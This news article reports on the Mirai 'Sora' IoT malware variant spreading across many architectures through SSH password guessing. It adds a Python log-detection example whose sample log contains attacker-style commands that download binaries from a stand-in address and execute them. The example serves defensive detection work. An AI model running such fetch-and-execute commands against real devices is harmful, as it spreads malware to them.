Big changes on the IoT malware scene. Security researchers have spotted a version of the Mirai IoT malware that can run on a vast range of architectures, and even on Android devices.
This Mirai strain is called Sora and was first spotted at the start of the year.
Initial versions were nothing out of the ordinary, and Sora’s original author moved on to developing the Mirai Owari version shortly after Sora’s creation.
“SORA is an abandoned project for now and I will continue to work on OWARI,” Wicked, the Sora malware author, said in an interview with NewSky Security.
Mirai Sora variants are making a comeback
The Sora code was abandoned, but not forgotten. Ankit Anubhav, a malware analyst with NewSky Security, told Bleeping Computer that the number of Sora detections has been steadily increasing since June. See graph below.
It appears that other malware authors took it upon themselves to improve SORA’s code. A Symantec report published today details one such improved Sora version.
New Sora version compiled with Aboriginal Linux
The thing that stood out about this new Sora version was that the malware author compiled it with Aboriginal Linux, a toolchain utility that takes source code and generates binaries for a considerable number of platforms.
The author behind this new strain was using all these binaries in his infection process, trying to spread his Sora variant to as many devices as he could.
Once he gained access to a device by guessing its SSH password, the infection routine would download and execute a list of Sora binaries, one by one, until it found one appropriate for the infected device’s platform.
This particular Mirai Sora variant that used Aboriginal Linux has been around since July. Symantec says they found binaries that successfully executed on the Android and Debian operating systems, platforms that Mirai has never been successful at infecting before.
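The routine described above, fetching one build after another and running each until one fits the platform, leaves a recognizable trace in per-session command logs. The following Python example is added here and is not from the Symantec report or the original article; the log format, addresses, file names and thresholds are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample (made-up log format, addresses and file names).
SAMPLE_LOG = """\
2018-08-01T10:00:01 sess=a1 cmd=wget http://203.0.113.5/b/x.arm -O /tmp/x.arm
2018-08-01T10:00:02 sess=a1 cmd=chmod +x /tmp/x.arm; /tmp/x.arm
2018-08-01T10:00:03 sess=a1 cmd=wget http://203.0.113.5/b/x.mips -O /tmp/x.mips
2018-08-01T10:00:04 sess=a1 cmd=chmod +x /tmp/x.mips; /tmp/x.mips
2018-08-01T10:00:05 sess=a1 cmd=wget http://203.0.113.5/b/x.x86 -O /tmp/x.x86
2018-08-01T10:00:06 sess=a1 cmd=chmod +x /tmp/x.x86; /tmp/x.x86
2018-08-01T11:30:00 sess=b2 cmd=wget https://example.org/t.tar.gz -O /tmp/t.tar.gz
2018-08-01T11:30:09 sess=b2 cmd=tar xzf /tmp/t.tar.gz
"""

LINE = re.compile(r"^(\S+) sess=(\S+) cmd=(.*)$")
FETCH = re.compile(r"\b(?:wget|curl)\b.*?\s-[oO]\s+(\S+)")
MIN_VARIANTS = 3      # assumed threshold: same file stem, 3+ suffixes executed
WINDOW_SECONDS = 120  # assumed: all executions fall inside this window

def find_multiarch_sessions(log_text):
    """Return {session: [suffixes]} for sessions that run one payload in many builds."""
    fetched = defaultdict(set)    # session -> paths written by wget/curl
    executed = defaultdict(dict)  # session -> {path: time of first execution}
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        ts, sess = datetime.fromisoformat(m.group(1)), m.group(2)
        for part in filter(None, (p.strip() for p in re.split(r";|&&", m.group(3)))):
            f = FETCH.search(part)
            if f:
                fetched[sess].add(f.group(1))
            elif part.split()[0] in fetched[sess]:
                executed[sess].setdefault(part.split()[0], ts)
    hits = {}
    for sess, runs in executed.items():
        by_stem = defaultdict(list)  # "/tmp/x" -> [(time, "arm"), ...]
        for path, ts in runs.items():
            stem, dot, suffix = path.rpartition(".")
            if dot:
                by_stem[stem].append((ts, suffix))
        for variants in by_stem.values():
            times = [t for t, _ in variants]
            if (len(variants) >= MIN_VARIANTS
                    and (max(times) - min(times)).total_seconds() <= WINDOW_SECONDS):
                hits[sess] = sorted(s for _, s in variants)
    return hits
```

On the constructed sample, session `a1` is flagged with the suffixes `arm`, `mips` and `x86`, while the ordinary archive download in session `b2` is not.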
Mirai activity is on the rise
Troy Mursch, a US-based security researcher who runs a Mirai tracker, told Bleeping Computer today in a private conversation that Sora isn’t the only one seeing a resurgence, and that the number of Mirai attacks has been steadily increasing all year.
Year-to-date, incoming traffic matching the Mirai-like signature has been observed from 86,063 unique source IPs.
Spikes of #botnet activity started in June. @circl_lu has shared a similar observation. pic.twitter.com/z0rMRVyI2I
— Bad Packets Report (@bad_packets) August 1, 2018
“Even as devices are rebooted they become fresh targets again as the underlying vulnerability never gets patched,” Mursch said, placing the blame on outdated devices that do not receive security patches.
Until this changes, Mirai will continue to plague the IoT scene and the Internet in general.